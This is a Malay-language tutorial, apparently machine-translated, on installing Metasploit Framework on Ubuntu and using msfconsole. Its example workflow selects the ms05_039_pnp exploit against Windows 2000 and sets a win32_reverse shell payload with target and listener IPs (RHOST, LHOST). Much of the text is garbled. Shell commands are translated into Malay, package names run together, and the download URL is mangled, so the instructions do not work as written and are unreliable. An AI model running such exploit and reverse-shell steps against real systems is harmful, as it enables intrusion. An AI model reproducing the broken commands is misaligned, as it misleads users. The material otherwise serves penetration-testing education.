- Penilaian Kerentanan dan Pentesting
- Pembangunan tandatangan IDS
- Mengeksploitasi pembangunan dan penyelidikan
Pelepasan Metasploit utama terbaru telah memindahkan intinya ke pangkalan pengaturcaraan semua Ruby. Metasploit-framework menggunakan Ruby sebagai bahasa pengaturcaraan utamanya kerana Ruby adalah bahasa tafsiran yang kuat. Projek Metasploit sangat terkenal kerana ciri anti-forensik dan pengelakan pengesanan.
Metasploit umumnya menawarkan versi komuniti dan sumber terbuka Metasploit Framework tetapi ia juga mempunyai versi komersial seperti Metasploit Pro dan Metasploit Express. Ia juga mempunyai pangkalan data kod shell, kod shell ini dapat digunakan untuk melakukan shell balik ke mesin penyerang.
Seperti produk serupa yang lain seperti Canvas atau Core Impact dan produk keselamatan komersial yang lain, Metasploit-Framework dapat digunakan untuk memeriksa keselamatan sistem komputer atau masuk ke dalam rangkaian dan sistem. Sama seperti banyak alat keselamatan yang lain, Metasploit Framework dapat digunakan untuk aktiviti yang dibenarkan dan yang tidak dibenarkan.
Ikuti langkah di bawah untuk memasang Metasploit Framework di OS Ubuntu anda
Metasploit Frame mudah dipasang dan mempunyai beberapa pergantungan. Sebelum memasang, pastikan anda mengemas kini Ubuntu anda
$sudo apt-get kemas kini$sudo apt-get peningkatan
Memasang kebergantungan
Sebelum memasang, anda perlu memasang pergantungan berikut menggunakan tepat arahan
[dilindungi e-mel]: ~ $sudo apt-get pasang -dankeriting gpgv2autokonfigurasi bisonmembina-penting
git-corelibapr1 postgresql libaprutil1 libcurl4openssl-dev libgmp3-dev libpcap-dev
openssl libpq-dev libreadline6-dev libsqlite3-dev libssl-devcarilibsvn1 libtool
libxml2 libxml2-dev libxslt-devwgetlibyaml-dev ncurses-dev postgresql-contrib xsel
zlib1g zlib1g-dev
Memasang
curl digunakan untuk memindahkan fail dari komputer jauh dan menyokong banyak protokol, kami akan menggunakannya untuk memuat turun kod kerangka metasploit.
[dilindungi e-mel]: ~ $curl https://raw.githubusercontent.com/pantas7/metasploitsemua orang/tuan/konfigurasi/templat/metasploit-framework-pembungkus/msfupdate.erb
>pasang msf&&
Kemudian ubah kebenaran kod yang boleh dilaksanakan dengan menggunakan perintah chmod kemudian jalankan
Kebenaran:pemilik = Baca&Tulis(rw-)
kumpulan = Baca(r--)
lain = Tiada(---)
Pemilikan:
pemilik = akar
kumpulan = bayangan
$chmod 755pasang msf
Antaramuka Metasploit
Metasploit Framework mempunyai antara muka web, antara muka GUI (Armitage dan Cobal Strike) dan antara muka Command Line (msfcli, msfconsole). Ia juga menawarkan API seperti msgrpc untuk mengendalikan Metasploit dari jarak jauh atau menggunakannya bersama dengan beberapa bahasa skrip untuk tujuan automasi.
Ia juga mempunyai beberapa alat dan ciri lain yang dapat menghasilkan kod shell dan muatan dan menggabungkannya dengan pelaksanaan lain yang sah.
Msfconsole adalah antara muka baris Perintah Metasploit yang kuat. Untuk menjalankannya, mulakan perkhidmatan postgresql pertama, Jenis
[dilindungi e-mel]: ~ $sudoperkhidmatan postgresql bermula[dilindungi e-mel]: ~ $sudomsfconsole
Manual Metasploit
Perintah biasa untuk Metasploit dari Manual
pertolongan (atau ‘?’) - menunjukkan arahan yang ada di msfconsole
menunjukkan eksploitasi - menunjukkan eksploitasi yang dapat anda jalankan (dalam kes kami di sini, ms05_039_pnp mengeksploitasi)
menunjukkan muatan - menunjukkan pelbagai pilihan muatan yang dapat anda jalankan pada sistem yang dieksploitasi seperti memunculkan shell perintah, memuat naik program untuk dijalankan, dll. (Dalam kes kami di sini, win32_reverse mengeksploitasi)
maklumat mengeksploitasi [mengeksploitasi nama] - menunjukkan keterangan mengenai nama eksploitasi tertentu bersama dengan pelbagai pilihan dan keperluannya (mis. maklumat mengeksploitasi ms05_039_pnp menunjukkan maklumat mengenai serangan itu)
maklumat muatan [nama muatan] - menunjukkan keterangan mengenai nama muatan tertentu beserta pelbagai pilihan dan keperluannya (mis. info payload win32_reverse menunjukkan maklumat tentang melahirkan shell perintah)
gunakan [nama eksploitasi] - memerintahkan msfconsole untuk memasuki lingkungan eksploitasi tertentu (mis. gunakan ms05_039_pnp akan memunculkan command prompt ms05_039_pnp> untuk eksploitasi khusus ini
menunjukkan pilihan - menunjukkan pelbagai parameter untuk eksploitasi tertentu yang sedang Anda kerjakan
menunjukkan muatan - menunjukkan muatan yang sesuai dengan eksploitasi tertentu yang sedang Anda kerjakan
tetapkan PAYLOAD - membolehkan anda menetapkan muatan khusus untuk eksploitasi anda (dalam contoh ini, tetapkan PAYLOAD win32_reverse )
menunjukkan sasaran - menunjukkan OS dan aplikasi sasaran yang ada yang dapat dimanfaatkan
tetapkan SASARAN - membolehkan anda memilih OS / aplikasi sasaran khusus anda (dalam contoh ini, saya akan gunakan tetapkan SASARAN 0 untuk semua versi Bahasa Inggeris Windows 2000)
senarai set - membolehkan anda menetapkan alamat IP host sasaran anda (dalam contoh ini, tetapkan RHOST 10.0.0.200 )
tetapkan LHOST - membolehkan anda menetapkan alamat IP host tempatan untuk komunikasi terbalik yang diperlukan untuk membuka shell arahan terbalik (dalam contoh ini, tetapkan LHOST 10.0.0.201 )
belakang - membolehkan anda keluar dari lingkungan eksploit saat ini yang telah anda muatkan dan kembali ke arahan msfconsole utama
Kesimpulannya
Metasploit adalah kerangka yang sangat berguna yang digunakan oleh penguji Penetrasi dan penyelidik kerentanan. Beberapa alat komersil lain menawarkan fungsi yang serupa tetapi Metasploit sangat popular kerana sokongan lintas platform dan antara muka GUI dan CLI yang mudah digunakan. Ini khas untuk penguji Penetrasi dan Teamers Merah tetapi sesiapa sahaja boleh menggunakannya untuk mengamankan rangkaian rumah atau syarikat mereka. Sekiranya anda berminat untuk belajar Metasploit, inilah yang terbaik sumber percuma .